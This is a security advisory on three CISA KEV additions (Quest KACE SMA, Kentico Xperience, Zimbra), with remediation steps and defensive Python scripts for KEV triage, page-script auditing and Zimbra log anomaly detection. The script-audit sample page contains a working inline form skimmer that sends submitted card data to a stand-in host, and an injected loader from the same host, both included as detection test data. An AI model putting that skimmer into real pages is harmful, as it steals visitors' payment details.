CISA's latest additions to the Known Exploited Vulnerabilities (KEV) catalogue cover three categories of enterprise infrastructure, each with confirmed active exploitation: endpoint management platforms, enterprise content management systems, and email collaboration infrastructure.
Quest KACE SMA: CVSS 10.0, Unauthenticated SQL Injection
The highest-severity addition is an unauthenticated SQL injection in Quest KACE Systems Management Appliance (CVE-2025-32975, CVSS 10.0). KACE SMA is an enterprise endpoint management and help desk platform used to manage software deployment, patch management, and asset inventory across enterprise workstations and servers.
An unauthenticated attacker with network access to the KACE management interface can extract the full appliance database, which contains endpoint inventory, patch status, software deployment configurations, helpdesk ticket content, and potentially cached credentials used for remote management tasks. Where KACE holds administrator credentials for managed endpoints, exploitation is a direct path to those credentials.
The CVSS 10.0 reflects the combination: no authentication required, exploitable over the network, complete database disclosure. KACE's role as an IT management plane, with knowledge of every managed device's state and potentially the credentials to administer them, means exploitation has downstream access implications far beyond the appliance itself.
KACE management interfaces are usually placed on internal network segments reachable by IT staff, which reduces exposure compared with internet-facing systems. However, a threat actor already inside the enterprise network (via phishing or a compromised workstation) has the adjacency needed to exploit this without ever touching the internet perimeter.
Kentico Xperience: Exploited CMS
Kentico Xperience, an enterprise digital experience and content management platform used for corporate websites and digital portals, has been added to the KEV catalogue with confirmed exploitation. CMS platform exploitation typically serves one of three purposes: web skimming (injecting JavaScript that steals form data from visitors), watering hole attacks (modifying content to deliver malware to site visitors), or as a foothold for further access to internal infrastructure connected to the CMS.
Organisations running Kentico Xperience should assume their instance may already have been targeted and investigate now rather than waiting for specific indicators. The audit questions are whether site content or templates have been modified unexpectedly, whether administrative user accounts have been added, and whether the CMS application has made unexpected outbound connections.
Zimbra ZCS: Continuing Active Exploitation
Zimbra Collaboration Suite appears in the KEV catalogue again, continuing the sustained exploitation of Zimbra deployments that has characterised threat actor activity throughout 2025 and 2026. Zimbra deployments, spanning both the open-source and commercial editions, are a large target surface for credential harvesting: access to an email platform gives attackers authentication tokens, correspondence, and contact data.
Organisations running Zimbra should apply current security patches and conduct a thorough review of mail server authentication logs for credential-access anomalies.
What KEV Additions Mean for Vulnerability Management Programmes
The CISA KEV catalogue is the closest proxy the security industry has to a confirmed exploitation signal. CISA adds vulnerabilities to the catalogue based on evidence of active exploitation in the wild, not theoretical exploitability or vendor CVSS scores. A KEV addition means:
- Attacker tooling exists: the exploit is reliable enough to be used in real attacks
- Exploitation is ongoing: not historical, but active at the time of CISA's addition
- Federal patch deadline applies: under BOD 22-01, federal agencies must remediate by the specified due date (May 4 for this batch)
For enterprise organisations outside the federal government, the BOD deadline provides a useful benchmark. Treating KEV additions as P1 vulnerabilities with the same urgency as the federal deadline is a reasonable and defensible patching policy.
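The policy above is easy to operationalise from the JSON feed CISA publishes for the catalogue. The script below is an added example (not code from the article or from CISA): it matches KEV entries against a local asset inventory and produces a P1 worklist keyed on the BOD 22-01 due date. The field names (cveID, vendorProject, product, dueDate, knownRansomwareCampaignUse) follow the public KEV feed; the feed content and the inventory are constructed here, the dateAdded value is a placeholder, the May 4 due date is assumed to be in 2026, and the second feed entry uses a deliberately non-existent CVE ID so the inventory match has something to filter out.

```python
"""Triage a CISA KEV feed against a local asset inventory.

Added example, not code from the article or from CISA. The JSON field names
follow the public KEV feed; the feed content below is constructed for this
example, and the dateAdded value and the second entry are placeholders.
"""
import json
from datetime import datetime

# Constructed sample feed. The KACE entry uses the CVE named in the article and
# the May 4 due date (year assumed to be 2026); the second entry is a
# placeholder with a non-existent CVE ID so that the inventory match filters it.
SAMPLE_KEV_JSON = """
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {
      "cveID": "CVE-2025-32975",
      "vendorProject": "Quest",
      "product": "KACE Systems Management Appliance (SMA)",
      "vulnerabilityName": "Quest KACE SMA SQL Injection Vulnerability",
      "dateAdded": "2026-04-13",
      "shortDescription": "Unauthenticated SQL injection in the KACE SMA management interface.",
      "requiredAction": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.",
      "dueDate": "2026-05-04",
      "knownRansomwareCampaignUse": "Unknown"
    },
    {
      "cveID": "CVE-0000-00000",
      "vendorProject": "ExampleVendor",
      "product": "ExampleProduct",
      "vulnerabilityName": "Placeholder entry",
      "dateAdded": "2026-04-13",
      "shortDescription": "Placeholder.",
      "requiredAction": "Placeholder.",
      "dueDate": "2026-04-27",
      "knownRansomwareCampaignUse": "Unknown"
    }
  ]
}
"""

# Constructed inventory: vendor/product strings as a CMDB export might hold them.
INVENTORY = [
    {"host": "kace01.corp.example", "vendor": "Quest", "product": "KACE Systems Management Appliance"},
    {"host": "cms01.corp.example", "vendor": "Kentico", "product": "Xperience"},
    {"host": "mail01.corp.example", "vendor": "Zimbra", "product": "Collaboration Suite (ZCS)"},
]


def as_day(text):
    """Parse a KEV-style YYYY-MM-DD string into a date."""
    return datetime.strptime(text, "%Y-%m-%d").date()


def load_kev(feed_text):
    """Return the list of vulnerability entries from KEV feed JSON."""
    return json.loads(feed_text)["vulnerabilities"]


def match_inventory(kev_entries, inventory):
    """Pair KEV entries with inventory assets by vendor and product name.

    Vendor must match exactly (case-insensitive); product matches if either
    string contains the other, which tolerates suffixes such as '(SMA)'.
    """
    hits = []
    for entry in kev_entries:
        vendor = entry["vendorProject"].strip().lower()
        product = entry["product"].strip().lower()
        for asset in inventory:
            if asset["vendor"].strip().lower() != vendor:
                continue
            asset_product = asset["product"].strip().lower()
            if asset_product in product or product in asset_product:
                hits.append((entry, asset))
    return hits


def triage(hits, today):
    """Build a remediation worklist, soonest due date first.

    Every KEV hit is P1 regardless of CVSS: the catalogue is a confirmed
    exploitation signal, and the BOD 22-01 due date is reused as the internal
    deadline even outside the federal government.
    """
    rows = []
    for entry, asset in hits:
        days_left = (as_day(entry["dueDate"]) - today).days
        rows.append({
            "cve": entry["cveID"],
            "host": asset["host"],
            "due": entry["dueDate"],
            "days_left": days_left,
            "status": "OVERDUE" if days_left < 0 else "OPEN",
            "priority": "P1",
            "ransomware_use": entry.get("knownRansomwareCampaignUse", "Unknown"),
        })
    rows.sort(key=lambda r: r["days_left"])
    return rows


if __name__ == "__main__":
    worklist = triage(match_inventory(load_kev(SAMPLE_KEV_JSON), INVENTORY), datetime.now().date())
    for row in worklist:
        print(f'{row["priority"]} {row["status"]:7} {row["cve"]} on {row["host"]} '
              f'due {row["due"]} ({row["days_left"]:+d} days)')
```

Pointing `load_kev` at the live feed instead of the embedded sample and running it on a schedule turns the KEV catalogue into a ticket source; the product-name matching is deliberately loose because inventory strings rarely match CISA's wording exactly, so review the matches rather than auto-closing on a miss.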
Recommended Actions
Quest KACE SMA:
- Immediately restrict network access to KACE management interfaces to authorised IT administration hosts only; if the management port is reachable from general workstation segments, isolate it now as a compensating control
- Apply Quest Security Advisory patches as published
- Audit KACE for new administrator accounts, export configuration changes, and unusual API access in recent logs
- Rotate any domain or local administrator credentials stored in KACE remote management configurations
Kentico Xperience:
- Review CMS content and template modifications in audit logs for the past 60 days
- Check for unauthorised administrative accounts and reset all administrative credentials
- Apply current Kentico security patches; review Kenticoβs security advisories for affected versions
- Scan public-facing pages for injected JavaScript or modified content that was not deployed through authorised change management
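The last check, scanning public pages for scripts that did not come through change management, can be scripted as a baseline comparison. The code below is an added example, not Kentico's code or the article's: it extracts every script tag from a rendered page and flags external scripts from hosts outside an approved set and inline scripts whose SHA-256 is not in the approved set. The page, the allowed hosts, and the approved inline snippet are constructed for the example; in practice the page is fetched from the live site and the baseline is generated from the last approved deployment.

```python
"""Flag scripts on a public page that are not in the deployment baseline.

Added example, not Kentico's code or the article's. The page, allowed hosts
and approved inline snippet are constructed; generate the real baseline from
the last approved deployment and fetch pages from the live site.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so they land here.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_scripts(html, allowed_hosts, approved_inline_hashes):
    """Return findings for script tags not covered by the baseline.

    Relative script paths (no host) are treated as served by the site itself;
    whether those files were modified is a question for the CMS/file audit.
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).netloc.lower()   # handles https://, //host/ and relative paths
        if host and host not in allowed_hosts:
            findings.append({"type": "unknown-external-script", "value": src})
    for body in collector.inline:
        digest = sha256_hex(body)
        if digest not in approved_inline_hashes:
            findings.append({"type": "unknown-inline-script", "value": digest, "snippet": body[:60]})
    return findings


# Constructed baseline: hosts and inline snippets approved at the last deployment.
ALLOWED_HOSTS = {"www.example-corp.test", "cdn.example-corp.test"}
APPROVED_INLINE = ["window.dataLayer = window.dataLayer || [];"]
APPROVED_INLINE_HASHES = {sha256_hex(s) for s in APPROVED_INLINE}

# Constructed page: one approved inline snippet, one approved CDN script, plus an
# injected loader from an unknown host and an inline skimmer hooking form submits.
SAMPLE_PAGE = """
<html><head>
<script>
  window.dataLayer = window.dataLayer || [];
</script>
<script src="https://cdn.example-corp.test/site.js"></script>
<script src="/scripts/forms.js"></script>
<script src="//static.example-bad.invalid/jq.min.js"></script>
</head><body>
<form id="checkout"><input name="card"></form>
<script>
  document.addEventListener("submit", function (e) {
    var d = new FormData(e.target);
    new Image().src = "https://static.example-bad.invalid/c?" + new URLSearchParams(d);
  });
</script>
</body></html>
"""


if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_PAGE, ALLOWED_HOSTS, APPROVED_INLINE_HASHES):
        print(finding["type"], finding["value"], finding.get("snippet", ""))
```

Run this against the rendered HTML of each public page (not the template source), because skimmers injected via the database or a compromised template only show up in what visitors actually receive. A hash mismatch on an inline script is a change to review, not proof of compromise: legitimate releases also change hashes, which is why the baseline must be regenerated at every approved deployment.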
Zimbra ZCS:
- Apply current Zimbra security patches for your installed version
- Review authentication logs for credential stuffing, successful logins from unexpected geolocations, and IMAP/POP access to accounts that normally use webmail
- Enable two-factor authentication for Zimbra administrative and webmail access
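The log review in the second bullet can be scripted as three detections over Zimbra's authentication audit records: many failed logins from one source across many accounts (credential stuffing), successful logins from outside the networks a user population is expected to come from (an offline stand-in for geolocation), and IMAP/POP3 logins to accounts whose history is webmail only. The code below is an added example, not Zimbra's code or the article's. The sample lines are constructed in the shape of Zimbra's audit.log "security - cmd=Auth" records; validate the regex against your own installation's log format before relying on it. The expected-network list and the per-account protocol baseline are constructed stand-ins for what you would derive from your network documentation and historical logs.

```python
"""Triage Zimbra authentication records for credential-access anomalies.

Added example, not Zimbra's code or the article's. Sample lines are
constructed in the shape of Zimbra audit.log auth records; the regex must be
checked against a real installation. Expected networks and the per-account
protocol baseline are constructed stand-ins.
"""
import ipaddress
import re
from collections import defaultdict

AUTH_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d),\d+ \S+\s+\[[^\]]*\] \[(?P<ctx>[^\]]*)\] "
    r"security - cmd=Auth; account=(?P<acct>[^;]+); protocol=(?P<proto>[^;]+);(?P<rest>.*)$"
)

# Constructed sample: 10.0.0.0/8 is the office network; 198.51.100.7 and
# 192.0.2.44 (RFC 5737 documentation ranges) are outside it. The last line is
# an unrelated record the parser must ignore.
SAMPLE_AUDIT_LOG = """\
2026-04-21 08:12:03,114 INFO  [qtp1-7:https://mail.example.com/service/soap/AuthRequest] [name=alice@example.com;oip=10.0.0.5;ua=zclient/10.0.0;] security - cmd=Auth; account=alice@example.com; protocol=soap;
2026-04-21 08:14:51,902 INFO  [ImapServer-12] [ip=198.51.100.7;oip=198.51.100.7;] security - cmd=Auth; account=alice@example.com; protocol=imap;
2026-04-21 08:15:01,003 INFO  [qtp1-9:https://mail.example.com/service/soap/AuthRequest] [oip=192.0.2.44;ua=python-requests/2.31;] security - cmd=Auth; account=bob@example.com; protocol=soap; error=authentication failed for [bob@example.com], invalid password;
2026-04-21 08:15:01,210 INFO  [qtp1-9:https://mail.example.com/service/soap/AuthRequest] [oip=192.0.2.44;ua=python-requests/2.31;] security - cmd=Auth; account=carol@example.com; protocol=soap; error=authentication failed for [carol@example.com], invalid password;
2026-04-21 08:15:01,418 INFO  [qtp1-9:https://mail.example.com/service/soap/AuthRequest] [oip=192.0.2.44;ua=python-requests/2.31;] security - cmd=Auth; account=dave@example.com; protocol=soap; error=authentication failed for [dave@example.com], invalid password;
2026-04-21 08:15:01,633 INFO  [qtp1-9:https://mail.example.com/service/soap/AuthRequest] [oip=192.0.2.44;ua=python-requests/2.31;] security - cmd=Auth; account=erin@example.com; protocol=soap; error=authentication failed for [erin@example.com], invalid password;
2026-04-21 08:15:01,845 INFO  [qtp1-9:https://mail.example.com/service/soap/AuthRequest] [oip=192.0.2.44;ua=python-requests/2.31;] security - cmd=Auth; account=frank@example.com; protocol=soap; error=authentication failed for [frank@example.com], invalid password;
2026-04-21 08:20:17,450 INFO  [qtp1-3:https://mail.example.com/service/soap/AuthRequest] [name=carol@example.com;oip=10.0.0.9;ua=zclient/10.0.0;] security - cmd=Auth; account=carol@example.com; protocol=soap;
2026-04-21 08:21:00,010 INFO  [ImapServer-4] [ip=10.0.0.12;oip=10.0.0.12;] security - cmd=Auth; account=dave@example.com; protocol=imap;
2026-04-21 08:21:05,220 INFO  [qtp1-3:https://mail.example.com/service/soap/GetInfoRequest] [name=carol@example.com;oip=10.0.0.9;] SoapEngine - handler exception
"""

EXPECTED_NETS = ["10.0.0.0/8"]                     # constructed: where staff log in from
BASELINE = {                                       # constructed: protocols each account has used historically
    "alice@example.com": {"soap"},                 # webmail only
    "carol@example.com": {"soap"},
    "dave@example.com": {"soap", "imap"},          # a legitimate IMAP client user
}


def client_ip(ctx):
    """Prefer oip (the originating client behind the proxy) over ip."""
    fields = dict(kv.split("=", 1) for kv in ctx.split(";") if "=" in kv)
    return fields.get("oip") or fields.get("ip")


def parse_events(lines):
    """Turn auth records into dicts; lines this regex does not recognise are skipped."""
    events = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": m["ts"],
            "account": m["acct"].strip(),
            "protocol": m["proto"].strip().lower(),
            "ip": client_ip(m["ctx"]),
            "ok": "error=" not in m["rest"],
        })
    return events


def analyse(events, expected_nets, baseline, stuffing_threshold=5):
    """Apply the three detections and return a list of finding dicts."""
    nets = [ipaddress.ip_network(n) for n in expected_nets]
    failed_accounts_by_ip = defaultdict(set)
    findings = []
    for e in events:
        if not e["ok"]:
            failed_accounts_by_ip[e["ip"]].add(e["account"])
            continue
        addr = ipaddress.ip_address(e["ip"])
        if not any(addr in n for n in nets):
            findings.append({"type": "login-from-unexpected-source", "account": e["account"],
                             "ip": e["ip"], "detail": e["protocol"]})
        usual = baseline.get(e["account"])
        if e["protocol"] in ("imap", "pop3") and usual and e["protocol"] not in usual:
            findings.append({"type": "protocol-anomaly", "account": e["account"],
                             "ip": e["ip"], "detail": f"{e['protocol']} on a {'/'.join(sorted(usual))}-only account"})
    for ip, accounts in failed_accounts_by_ip.items():
        if len(accounts) >= stuffing_threshold:
            findings.append({"type": "credential-stuffing", "account": None, "ip": ip,
                             "detail": f"failed logins for {len(accounts)} distinct accounts"})
    return findings


if __name__ == "__main__":
    for f in analyse(parse_events(SAMPLE_AUDIT_LOG.splitlines()), EXPECTED_NETS, BASELINE):
        print(f["type"], f["account"] or "-", f["ip"], f["detail"])
```

On the constructed sample the script flags one account twice (a webmail-only user authenticating over IMAP from outside the office network), which is exactly the pattern to expect when a harvested password is replayed through a mail client. Tune `stuffing_threshold` and the time window to your volume, and build the protocol baseline from at least a few weeks of logs so that legitimate IMAP users are not reported.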